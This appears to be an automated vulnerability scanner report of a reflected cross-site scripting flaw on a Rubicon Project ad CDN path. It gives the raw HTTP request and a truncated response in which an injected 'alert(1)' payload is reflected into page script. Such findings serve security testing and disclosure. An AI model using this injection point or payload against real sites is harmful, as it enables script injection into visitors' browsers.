1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://tap2-cdn |
Path: | /partner/scripts/rubicon |
GET /partner/scripts/rubicon Host: tap2-cdn.rubiconproject User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.forbes.com Cookie: rpb=4212%3D1%264554%3D1 Content-Length: 10 |
HTTP/1.1 200 OK Server: TRP Apache-Coyote/1.1 p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Last-Modified: Mon, 02 Jan 2012 22:30:07 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Mon, 02 Jan 2012 22:40:07 GMT Date: Mon, 02 Jan 2012 22:30:07 GMT Content-Length: 10782 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <!-- Copyright the Rubicon Project 2010 --> <html> <head> <title></title> </head> < ...[SNIP]... == "undefined") dest[name] = defaults[name]; } return dest; } var rtb_sync = {}; var rtb_site_sync = {}; var rtb_pixel_set = ["rtb","aud","nets","pubs var request_region = "na242a9";alert(1)/ rtb_pixel_set = ["rtb","rtb_ext","aud", rtb_sync = {"ttl":14,"sample":100, ...[SNIP]... |